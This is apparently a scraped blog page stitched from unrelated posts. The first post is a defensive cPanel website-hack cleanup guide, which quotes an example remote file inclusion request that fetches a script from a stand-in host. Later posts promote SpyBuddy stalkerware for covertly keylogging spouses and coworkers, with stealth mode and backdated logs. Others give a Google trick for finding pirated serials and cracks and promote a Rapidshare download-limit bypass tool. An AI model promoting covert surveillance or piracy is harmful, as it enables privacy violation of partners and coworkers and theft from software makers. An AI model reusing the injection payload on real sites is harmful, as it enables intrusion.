• The invite is to click a link for a website, so there is not a form on the email. The form to buy something is on the website.

Website security : Steps to perform after your site is hacked,and how to prevent it by getting hacked

The server configuration discussed here is Linux/Apache with cPanel.The general steps will be the same on any server, but the specifics will differ.
There's a good chance you came to this page because your website was hacked and you want to know how to clean it up.

Step-by-step repair after a website hack

This will probably take several days. Don't think it's going to be easy.

1) Log into cPanel

If the line at the top that says, "Last login from: IP address" is not your IP address from the last time you logged in, write it down. It is probably the hacker.

2) Change passwords for cPanel and for publishing

Use strong passwords. A password MUST NOT BE a single word that is in any human language dictionary, and it SHOULD NOT CONTAIN any real word. It should be random characters.

a) If you publish with FrontPage, change your FrontPage password first:

1. Open your local copy of your site in FrontPage
2. Click the Remote Web Site tab and log in
3. Click Open your Remote Web site in FrontPage (this will open a new copy of FrontPage with your remote site in it)
4. Click Tools > Server > Change Password. Whenever you get a password prompt during this procedure, it wants the old one. It doesn't want the new one until it asks for it.

After changing the FrontPage password...

b) Log in to your webhosting account and change the password there

Some webhosts might use cPanel for this. Others might have a separate login for password changes. Consider changing the passwords for your email accounts, too.

3) If it is a dire emergency, take your website offline

If the hacker inserted extremely offensive pages or installed a virus, protect your visitors and your reputation by taking your site offline.
While it's closed, you likely won't be able to access your site through FrontPage. That's why you changed your FrontPage password before taking the site offline.

4) Enable log archiving in cPanel

1. Go to cPanel > Raw Log Manager.
2. Check the "Archive Logs..." box.
3. Uncheck the "Remove the previous month's archived logs..." box.
4. Click Save

If log archiving was off at the time of the hack, it may be too late to see the original hack. However, if the hackers come back, their activity might now be logged, allowing you to identify their IP address.

5) Find and remove all files installed by the hack

This describes an ideal cleanup operation. Will you be able to fully complete every step? Probably not.
If your site isn't huge, you might save a lot of trouble by deleting everything inside your public_html folder and republishing your entire site from a backup copy. You'll still need to inspect your root directory (above public_html) and its other subdirectories for damage.

5a) Get a complete list of all the files in your website

There are three methods (Sections 5a, 5b, 5c). For most purposes, this first cron job method will be easier to review in detail than the other two methods.
You probably don't have direct access to Linux on your server to create a directory listing, but you can create a cron job that will do it. It is the equivalent of the DOS command dir /s.

1. Go to cPanel > Cron jobs > Standard.
2. Enter the email address where you want the output sent,
3. Enter the command line to run. The switches are case-sensitive, so use exactly this capitalization:
   ls -1aFlqR
   Here it is in upper case to make the letters distinct, but this command is NOT the same as the one above. Don't use it: LS -1AFLQR.
   The switches for the ls command are described at http://www.ss64.com/bash/ls.html and http://en.wikipedia.org/wiki/Ls.
4. Make selections in all the other fields to specify a time several minutes in the future.
5. Click "Save Crontab".
6. After it runs, go back to Cron Jobs > Standard and delete this job.

The email will contain a listing with lines that look like the following examples for one directory and one file:

drwxr-x--- 33 user user 4096 Feb 5 20:51 public_html/
-rw-r--r-- 1 user user 16669 Feb 5 20:51 index.htm

A brief explanation:

d indicates a directory
The 3 groups of 3 (rwxrwxrwx) are permissions for User, Group, World.
r, w, x stand for Read, Write, Execute a program or Enter a directory.

Walkthrough of the above:

public_html above is a directory.
The User (owner, me) can read, write, or Enter that folder.
The Group (that I am member of) cannot Write to that folder (thus the "-" where the w would be)
The World (everyone else) has no permissions here ("---"). (I know that seems odd for public_html, but the reasons why are not useful here.)
index.htm, the home page:
User can Read or Write.
To everyone else (Group and World), the file is Read-only.
The user fields should show only your hosting account userID or some other ones that are obvious system names.
The numbers are file sizes.
The timestamps are timestamps.
There is further explanation in this post at Lunarforums.

How to use the listing:

7. If you have a file list like this that you made before the hack, compare the two lists to identify files in the new listing that don't belong.
8. If you don't have a prior list to compare against, review the new list for files that seem out of place. See What To Look For, below.

5b) Examine your site's files in cPanel > File Manager

If you can't use the cron job method, this is an alternative, but navigating up and down the directory tree will get very tedious very fast.

In File Manager, file and folder permissions are shown numerically. R=4, W=2, X=1. The permission level for a user is the sum, so the maximum a user can have is 7. If, for example, the User has RW, but Group and World only have R, then the permissions will be: 644.

5c) Examine your site's files using FTP

With an FTP view of your website, the folders and files look like what you are used to in Windows Explorer. FTP view is available using Internet Explorer 6 or 7 and Windows Explorer. FTP view is easy to navigate, but it doesn't show file and folder permissions.

a) FTP by IE6

In the IE6 address bar, type the FTP address for your site. It is probably something like: ftp://yourdomain.com/ or ftp://ftp.yourdomain.com/ If you don't get a login prompt, click File > Login As...

b) FTP by IE7

Help for this is available in IE7 Help (F1) > Contents > FTP.

1. Open Tools > Internet Options > Advanced
2. Make sure "Enable FTP folder view (outside IE)" is checked.
3. Click OK.
4. In the IE7 address bar, type the FTP address for your site.
5. Ignore the error page.
6. Click Page > Open FTP site in Windows Explorer...
7. At the FTP Folder Error dialog box, click OK.
8. Click File > Login As... to obtain the login prompt.

c) FTP by Windows Explorer

1. Enable the address bar (View > Toolbars > Address bar). You may need to unlock the toolbars, relocate, and resize it.
2. In the address bar, type the FTP address for your site.
3. At the FTP Folder Error dialog box, click OK.
4. Click File > Login As... to obtain the login prompt.

5d) What to look for

Regardless of the method you used to get your file list, look for and repair the following. If hacked pages contain clues such as URLs that will help identify the hacker, copy and save the useful text somewhere before you repair the page:

• Files you know don't belong there. Some hacks install files with ridiculously obvious names like hacked.html or vulnerable.php, etc. Other files might have nonsensical names or names consisting of random character strings. Some files might be in locations that make them suspicious, like a .php file in your /images folder.
  
  Be watchful for any files you don't recognize, but be careful because some of them are probably required for your site to function properly and you just never noticed them before. You cannot just delete all the files you didn't put on the site. Determine whether each one is malicious or not. When in doubt, try a web search on the filename or post a question in a forum where other people can tell you if that file is normal.
  
• Check your root directory ("/") and its subdirectories for malicious or altered files. Inspect everything carefully. Even if you delete the contents of your public_html and republish the site from scratch, this doesn't overwrite your folders above public_html, so you must check those manually.
  
• Find and remove malicious scripts. Look especially for PHP and CGI scripts that you didn't create. Inspect existing PHP and other plain text scripts for signs of tampering. Backdoor scripts left in place can allow the hackers back in even after you've changed your password.
  
  When in doubt, it is safest to stop using scripts you suspect might have been weak, especially ones you wrote yourself, until you can examine them and determine that they're safe. Rename or delete them so the hacker can't continue to access them by their previous names.
  
• Pages with modified dates more recent than you last saved the page yourself. Inspect the text and replace the file with a backup copy, if necessary.
  
• If you publish with FrontPage HTTP, it appears that whenever you publish any files, the timestamp of every .htm file on the site is set to the time of the publish. So in this case your timestamps may all be identical, except for hacked pages.
  

6) Check all file and folder permissions

Using the complete file list you made, or File Manager, make sure all file and folder permissions are what they should be. When in doubt, you can compare the permissions of similar or neighboring files and folders. A hacker is unlikely to bother with changing all permissions. Review the brief "RWX" explanation above and apply common sense. Your site visitors are "World", so World needs Read access to files they are supposed to see. World should almost never have Write access to anything. Although different hosts might have different rules, common permissions for world-accessible folders are 755, and common permissions for world-accessible files are 644. It is left to you to figure out why. If you start running across what look like permissions hacks, you will need to do some studying and some detailed investigation of each file and folder.
A hacker can modify file or folder permissions to allow them to get back in even after you clean up everything else in your site. If they can get Write permission to one folder, they can upload exploit scripts to it and run them.

7) Change your passwords again

In case someone was "watching" inside your site while you did it the first time, do it again now that you know the site is clean.

8) Try to identify the hacker's IP address

Stats programs like Analog, Webalizer, or AWStats are not going to be helpful here because they generate aggregated statistics. You need detail.
cPanel > Web/FTP Stats > Latest Visitors is useful and easy. It is a good place to go when you first notice the hack, but it is only a start. You really need the full raw logs.

a) If you have never used your site's raw access logs before:

You website's raw access logs are stored and sent to you as gzipped files. If you don't have a program that will extract *.gz files, get the 7-Zip program from http://www.7-zip.org/. It is a command line utility that you run from a "DOS box" (aka "Command Prompt").

b) Get your logs from cPanel > Raw Log Manager

1. Go to cPanel > Raw Log Manager
2. Click the name of the file you want to download.
3. At the Open or Save prompt, click Save. Use a descriptive filename. Save the file to a folder that will be easy to navigate to in a Command Prompt. C:\TEMP works well.
4. Open a Command Prompt:
   Start > All Programs > Accessories > Command Prompt, or
   Start > Run > cmd.exe
5. Go to the folder where you saved the .gz file: cd \temp
6. Type the command line to extract the .gz file:
   7za.exe x filename.gz
7. You should get a report that says "Everything is Ok".
8. I usually delete the .gz file and rename the output file to .log.
9. WordPad is best for viewing these log files as text. Set the font to a monospaced font, with word wrap Off.
10. You can import your HTTP (regular) log file into the Webstats.mdb Access database. It won't import your FTP log.
11. The HTTP log will also import into Excel, but you will need to tweak the text import wizard settings to get the fields into their columns properly.
12. The FTP log is probably best viewed as text.
    

Go through the logs carefully. If log archiving was on at the time of the hack, look for suspicious activity in the days prior to the hack. Keep watching the logs in case the hackers come back.
Your regular log will show HTTP accesses, your normal site visitors. Mixed in with all the visitors and legitimate robots, you could find a person or robot GETting pages in an abnormal browse sequence (not following links on your site) or trying to GET pages that don't exist on your site. They might be seeing if your site has particular pages that are part of widely used scripts that are known to have vulnerabilities. Look for HTTP POST activity. Not all POSTs are suspicious, though. If you use PHP, look for requests that attempt to inject code or variables into the page:
GET /index.php?inc=http://badsite.com/hackscript.txt.

Your FTP log will show FTP accesses, one way that hackers can download your pages, modify them, and upload them back to your website. The only IP addresses in the FTP log should be yours and other authorized FTP users.
In both logs, check the field called REMOTE_USER, User, or UserID. In the HTTP log, this field is blank ("-") most of the time. Where it does have a value, make sure it's your UserID and that the IP address is yours. Make sure the timestamps on the accesses match the times you were logged in.

c) Use .htaccess or cPanel > Deny IP to block the hacker's HTTP access to your site

If you identified the hacker's IP address, one site where you can look it up to get more information about it is http://whois.domaintools.com/.
You can ban the hacker's IP address from your site using your public_html/.htaccess file. Apache documentation for this is at: http://httpd.apache.org/docs/1.3/mod/mod_access.html.
Review the instructions in a prior article for how to open .htaccess for editing. As described there, insert the following line in a part of the file that is not enclosed in HTML-like tags.

deny from nnn.nnn.nnn.nnn

The nnn's are the IP address to block.
If the hacker returns with a different IP that is in the same IP range (i.e. using the same ISP), you can block the whole range for a while, although that carries the risk of banning legitimate visitors, too.

The Apache documentation has instructions for banning a range. Some IP ranges are easily specified using a simple wildcard notation. Others ranges can only be successfully defined using "CIDR/netmask" notation. Although it looks intimidating, it's easy after the first time you do it. I have a separate article describing how to calculate and use the CIDR/netmask.

d) If the hacker has obtained access to your cPanel or FTP, banning their IP address in .htaccess will NOT keep them out of cPanel and FTP.

If they have scripts that they call by HTTP, it will prevent them from doing that, but only until they log into cPanel and un-ban themselves in .htaccess.

9) Investigate what made the hack possible

It might be obvious or it might require detective work. The section below on hack prevention describes some common avenues of attack. It is important to identify how they got in so you can prevent the next attack. For example, if they got in through a vulnerable script, and you don't rewrite or update the script, all the work you've done to this point is useless because they can come right back and wreck your site again.

Three common avenues:

1. Old versions of third party scripts with known vulnerabilities. Make sure you are using the latest versions of software for forums, image galleries, blogs, and everything else.
   
   If you do all your installations through Fantastico, you can check your versions at cPanel > Fantastico > Installations overview.
   
   Otherwise, the version is usually shown on the pages generated by the script, so go to your gallery, blog, or forum, and look around. Then compare the version to the latest one being distributed at the website for that software.
   
2. The site password was easy to crack.
3. Homebrew PHP or CGI scripts were flawed and had security holes. Make sure the settings in your php.ini file are as secure as possible.

10) Report or go after the hacker legally?

You can try, but your chances of getting anywhere with it might not be great.
Hacking is a violation of the terms of service for any legitimate web host or ISP. If you can prove that someone is using a particular IP address for hacking, you could report the incident to the web host or ISP in hopes that they might shut the perpetrator down. The contact email is often abuse@ the company.

What to do BEFORE your website is hacked, so it doesn't get hacked

What is a hack?

A hack occurs when someone gets write access to your server so they are able to modify, add, or delete pages.
Many people ask, "How could my site have been hacked? The hacked page was 100% pure HTML."
The answer is that the modification of the page wasn't the hack. The hack was when they got write access to the server. Modifying the page was simply the thing they chose to do after they got in. Once they get in, they can do ANYTHING with your site that you can do, including alter static pages.

Why do they do it?

Business/money

The goal of most site hacks is to use vulnerable sites to make money. It is a business enterprise. They can:

• Use your site's mail server to send spam.
• Insert links to their own sites, visible or invisible. The links from your site to theirs bring traffic and also boost their site's rankings in search engines.
• Insert their AdSense code onto your site's pages so clicks are credited to them.
• Put phishing pages on your site to try to obtain confidential information from your visitors.
• Use your server to host illegal content.
• Add viruses, adware, or spyware to your site so it's downloaded onto your visitors' computers to try to obtain their confidential information.

Fun, challenge, prestige, or malice

There are hackers who deface sites individually, but it's time-intensive to hack sites one by one. Occasionally a site is hacked by someone who dislikes the site or its owner. These are not the major threats.

How do they do it?

Some examples:

• Automated web crawlers cast a wide net, identifying websites with a specific security weakness. For example, if a popular script is found to have a vulnerable page called forminfo.php, the crawler will visit every website it knows about, issuing a request to GET forminfo.php. If the request returns a code 404 (Page Not Found), then it moves on. If the page returns a code 200 (Success), the website becomes a target, either by a human hacker or by a computer program that executes the steps to exploit the weakness and install the hacker's files onto the site.
  
• Crawl the web searching the source code of web pages for PHP or CGI scripts with names commonly used by email forms handlers. When one is found, an automated procedure starts sending it input to test whether the script can be tricked into sending spam to third parties.
  
• Automated password cracking programs hammer at cPanel logins until the correct user ID and password combinations are found. People who create their own passwords are remarkably predictable, and the algorithms used for password cracking are remarkably sophisticated.

Steps to prevent hacking

1) Always use strong passwords

If you don't know what a strong password looks like, go to https://www.grc.com/passwords.htm. The third row on that page ("63 random alpha-numeric characters") contains the types of characters to use for cPanel passwords. Pick the first, or any, 8 chars from that row. Any password that does not look like the ones you see on that page are bad.

• In cPanel, only 8 characters are significant, so use all 8. Use a mixture of upper and lower case letters and digits. Special characters (punctuation, etc.) do not seem to be allowed by cPanel.

The #1 threat to your website is internet attackers. There are thousands of them, and they will definitely try to damage your website if they get in. That is why you MUST use strong passwords that are difficult to crack. This must be the FIRST consideration.

Write down your strong password so you don't forget it. People sometimes avoid strong passwords because they've heard passwords should never be written down. That rule was for Defense Department workers who had to worry about Soviet spies. You don't. You have to worry about internet hackers. Writing down your strong password is only a trivial security risk. Using a weak password because that's the only kind you can remember is a huge security risk.

Keep your written passwords appropriately safe for your situation. Do you have mischievous children? Don't leave passwords lying around where they can find them. Malevolent coworkers? Don't leave passwords in your desk drawers. Do you habitually lose your wallet or purse? Well then, don't keep them there, either. Take whatever precautions are necessary for YOUR situation.
If you have a userID associated with your hosting account, keep that as secret as possible, too, because a hacker needs it to log in as you. Don't post it in forum messages.
About strong passwords: http://en.wikipedia.org/wiki/Strong_password#strong_passwords

2) Don't weaken your server's file and folder permissions

• Do not modify the file and folder permissions on your server until you know what you're doing. Study the permission settings carefully. Don't guess.

Each folder and file on your Linux server has a set of permissions that determine who can read or write that file, execute that program, or enter that folder.
One mistake in a file or folder permission can allow a hacker to get into your site, and they won't even need your password to do it.

3) Keep third party scripts up to date

If you use popular third party scripts like Coppermine, WordPress, SMF, vBulletin, phpBB, or any others, get on a mailing list or visit forums where updates are announced. When a security update is released, install it without delay.
When a vulnerability is found in a commonly used script, it is likely to be exploited soon by a lot of hackers because it gives them access to a large number of sites.

4) Write your own scripts securely

• Be aware of the potential security risks of each language you use.
• For PHP, use a php.ini file to block some common avenues of attack.
• Don't use potentially insecure features of any language until you've studied and understand them. There are lots of online resources for learning how to code securely.

A vulnerable script can give hackers access to your user database and financial or other confidential or data.

• All data that comes into your script from the outside world poses a potential security risk. If your script takes input from a user or from passed parameters in a URL string or from a cookie, the input needs to be checked for validity, tested to determine if it contains injection exploit code, and cleaned ("escaped") before you use it to include a file or access a database.

5) Block suspicious accesses with .htaccess

If you detect especially suspicious activity in your logs, you can block the IP addresses by using cPanel > Deny IP or with the appropriate code in your .htaccess file. Don't be overzealous, though. It takes experience to learn what's really suspicious and what's just unfamiliar, and accidentally blocking legitimate visitors is bad public relations. Besides, if your site is otherwise secure, the probes to find security holes will fail, anyway.

6) Keep spyware off your computer. Prevent password interception.

• If you use a wireless network, make sure it is not open to eavesdroppers.
• Keep your computer free of spyware such as keyloggers.
• If you're worried about your password being intercepted between you and your server, use encrypted https to log in to your server.

Preparations that will make hack diagnosis easier

1) Turn on log archiving in cPanel

Periodically delete the accumulated logs so they don't consume all your hard drive space.

2) Get a complete list of your site files while they are known-good

This will be a baseline list of all the files that are supposed to be in your website. After a hack, it will help you decide whether a file you don't recognize is related to the hack or is a required system file that you just never noticed before.

3) Explore your website and become familiar with what is there

Not just your pages, but the whole site, using FTP or File Manager. Get used to what is normal so things that aren't will catch your attention.

How to know if you've been hacked

1) Whenever you log into cPanel,

Make sure "Last login from:" at the top of the screen shows your IP address from the last time you logged in.

2) Be alert for anything unusual when reviewing your

• Access logs,
• Usage reports in Webalizer, AWStats, Google Analytics, ...
• Site data at Google Webmaster Central, (Google account and login required)
• Site data at Yahoo! Site Explorer. (Yahoo! account and login required)

Watch for occurrences of

• Unusual page names that you know you didn't put on your site,
• Referrals or backlinks coming from weird sites or bad neighborhoods,
• Any indications that your site has pages it shouldn't have, or connections to other sites that it shouldn't have any connection with.

3) If your position in Google falls suddenly or if you drop out of the index,

one possible cause is that an exploit made modifications to your pages. Google sometimes notifies webmasters when they suspect a site has been hacked: http://www.mattcutts.com/blog/how-google-handles-hacked-sites/. They'll try to contact you by any email address they can discover in their files or on your site. If Google discovers that your hacked site is now trying to distribute viruses or other badware, they sometimes also warn visitors about it when they try to go to your site from a search results page.

4) On search engine result pages (SERPs), make sure the text snippets for pages from your site consist of text you know is on those pages.

5) Use your browser's View Source feature occasionally to look for invisible links in the HTML of your pages.

6) Check your site's safety report and outlinks at http://www.siteadvisor.com/.

PortableApps : Take your PC anywhere

Now you can carry your favorite computer programs along with all of your bookmarks, settings, email and more with you. Use them on any Windows computer. All without leaving any personal data behind. Yes its true, Portable applications are now available lets see in detail

PortableApps.com provides a truly open platform that works with any hardware you like (USB flash drive, iPod, portable hard drive, etc). It's open source built around an open format that any hardware vendor or software developer can use.

What is a portable app?
portable - carried or moved with ease
app - a computer program like a web browser or word processor

A portable app is a computer program that you can carry around with you on a portable device and use on any Windows computer. When your USB flash drive, portable hard drive, iPod or other portable device is plugged in, you have access to your software and personal data just as you would on your own PC. And when you unplug the device, none of your personal data is left behind.

No Special Hardware - Use any USB flash drive, portable hard drive, iPod/MP3 player, etc
No Additional Software - Just download the portable app, extract it and go
No Kidding - It's that easy
Consider the Possibilities...

* Carry your web browser with all your favorite bookmarks
* Carry your calendar with all your appointments
* Carry your email client with all your contacts and settings
* Carry your instant messenger and your buddy list
* Carry your whole office suite along with your documents and presentations
* Carry your antivirus program and other computer utilities
* Carry all your important passwords and account information securely

Consider the Convenience...

* Have your favorite websites handy to recommend to a friend or colleague
* Have your presentation AND the required software ready to go for that big meeting
* Have your password with you if you want to bank online while traveling
* Have utilities handy when visiting family or friends that are having PC problems

Download the Suite from hear:

Standard Package - 89.5 MB
Lite package - 30.4 MB

This software is 100% Free
The Portable Apps Suite™ is free. It contains no spyware. There are no advertisements. It isn't a limited or trial version. There is no additional hardware or software to buy. You don't even have to give out your email address. It's 100% free to use, free to copy and free to share.
For more details on this software visit PortableApps.com

Spy Buddy

SpyBuddy is the ultimate solution for monitoring spouses, children, co-workers, or anyone else! SpyBuddy allows you to monitor all areas of your PC, tracking every action down the last keystroke pressed. SpyBuddy has the ability to log all AOL/ICQ/MSN/AIM/Yahoo chat conversations, all websites visited, all windows opened and interacted with, every application executed, every document printed, all text and images sent to the clipboard, and even every keystroke, including system keys! SpyBuddy also allows for screen capturing for visual surveillance! Recorded data can either be viewed using built in log viewers, or can be e-mailed to your e-mail address for remote viewing.

Feature List: Surveillance and Logging Features

• Internet Conversation Logging - Log both sides of all chat and instant message conversations for AOL/ICQ/MSN/AIM/Yahoo Instant Messengers.
• Disk Activity Logging - Record all changes made to your hard drive and external media. SpyBuddy will record all of the following: Created Directories, Deleted Directories, Created Files, Deleted Files, Renamed Files, & Renamed Files.
• Window Activity Logging - Capture information on every window that were viewed and interacted with.
• Application Activity Logging - Track every application/executable that was executed and interacted with.
• Clipboard Activity Logging - Capture every text and image item that was copied to the clipboard.
• AOL/Internet Explorer History - View All AOL and Internet Explorer websites visited before SpyBuddy was installed, and when SpyBuddy was not recording!
• Printed Documents Logging - Log specific information on all documents that were sent to the printer spool.
• Keystroke Monitoring - Track all keystrokes pressed [including hidden system keys!] and which windows they were pressed in. Keystrokes can also be passed through a formatter for easy viewing/exporting.
• Websites Activity Logging - Log all website title and addresses that were visited on the PC. Supported browsers include Internet Explorer, Netscape, and Opera!
• Screen Shot Capturing - Automatically capture screen shots of the desktop (or the active window) at set intervals - perfect for visually seeing what was happening on your PC when you weren't around!

Security Features

• Powerful Stealth Mode - Run SpyBuddy in total stealth - the user will not know that it is running!
• Website Filtering - Create website and protocol ban-lists to prevent websites from being viewed while SpyBuddy is active!
• Website Watching - Manage a list of websites for SpyBuddy to monitor, and if a specified keyword/phrase is found, it will record it.
• Log File Back Dating - Discretely backdate all log files to prevent file snoopers from detecting newly created log files.
• Windows Startup - Configure SpyBuddy to startup for a single user, or to start up as a service for all users on the system - perfect for monitoring multiple users of a PC.
• User-Based Startup - Configure SpyBuddy to only record specific users of a PC, rather than recording all the users.
• Customizable HotKey - For total concealment, SpyBuddy allows you to customize the default hotkey.
• Automatic Active Startup - Configure SpyBuddy to start in "Active" mode when it is started.
• Password Protection - SpyBuddy is password protected to prevent others from starting/stopping the monitoring process, as well as changing SpyBuddy configuration settings!
• Startup Alert - Automatically have SpyBuddy display a custom alert message when it is started - perfect for letting the users of the PC know that they are being monitored.

Special Features

• E-Mail Log Delivery - SpyBuddy can periodically send you recorded activity logs as a specified format (HTML/Excel/Text/CSV/XML) as well as desktop screenshots to your e-mail inbox at specified intervals.
• Log Exporting - Export SpyBuddy Activity logs to 5 different formats, such as Microsoft Excel, HTML, CSV, Plain Text, and XML!
• Precise User Tracking - SpyBuddy will ALWAYS logs the current Windows user and the time and date an action if performed. This will allow you to precisely track activity down to the exact user, at the exact time it happened.
• Inactivity Timeout - Automatically suspend SpyBuddy from monitoring the PC if the machine is inactive for a specified amount of time.
• Scheduling Agent - Automatically configure SpyBuddy to start or stop at specified times and dates, or configure it to perform the same time everyday of the week!
• Automatic Log Clearing - SpyBuddy can automatically eradicate old/outdated logs from the machine after a certain amount of data or keystrokes have been logged.
• Thread Priority - Adjust SpyBuddy to adapt to your system. Using the built in Thread Priority utility, you can make SpyBuddy run as fast as you need it to depending on your systems specifications!
• Quick Configuration Wizard - SpyBuddy comes included with its own, highly powerful configuration wizard. This will help you get up and running with SpyBuddy in just minutes!
• Easily Transferable - SpyBuddy allows you to import/export your settings, so that if you have installed SpyBuddy on multiple machines, you can easily transfer your settings across a network.
• Friendly Interface - SpyBuddy contains an extremely easy-to-understand graphical user interface, which will allow you to familiarize yourself with the software in no time!
• Helpful Documentation - SpyBuddy includes a great help file to help you answer any possible questions you may have concerning SpyBuddy.

Use Google to get Serial No of any Software

Most of the people downloading trial and using it, only after the expiration of trial they try for crack, Serial No, Keygen, Patch....

But many don't known where to get Serial No, Some websites may be infect your system with Trojan horse, Viruses, Ad ware, Spy ware....

So for beginners this is a simply way to find hack with less effort and it saves time to, But make sure you have anti virus activated before trying to get some Serials, Patches to avoid data loss

Just follow the steps as instructed below

1) Go to http://www.google.com
2) type this syntax in search bar " 94FBR"
3) Replace Product name with desired software and leave a space then type 94FBR
4) Press enter, thats it

Now you receive Many pages which contains Serial no, Crack, Patches....

Just make a try, this simple trick works for many people even me .

Rapidshare

CMS Grabber is the best tool I ever found on internet, this tool made me stun when I started using this, many rapid share users are still searching for free premium account, this tool make it useless. Using this tool we can download files from rapid share without any download limitations, multiple files at once, this is more than rapid share premium account. Lets see it in brief

THE ONLY LEGAL PROGRAM FOR DOWNLOADS FROM RAPIDSHARE !!!

Bypasses download limitations. Download multiple files at once. Download even more than with premium !
This release is sponsored by StackFile Corp.
What's new
- fixed rapidshare.com grabber
- fixed rapidshare.com link checker
- added huawei tool for renewing IP address for ADSL users(Supported hardware: SmartAX MT882 ADSL Router/Modem) - currently we support only USB mode, next version will alow to specify router address (it is now set to 192.168.1.2 -- you can configure your router to that address anyway so it will work in "Network Mode" -- i.e. when connected to the LAN NIC))
This release is sponsored by StackFile Corp and coded by SpongeBob.
NOTE: This program is not Vista compatible, but works fine with disabled UAC (User Account Control - very useful and inovative thing which renders your computer useless and annoying to use it).

Download from here

Homepage: CMSzone
The Home of grabber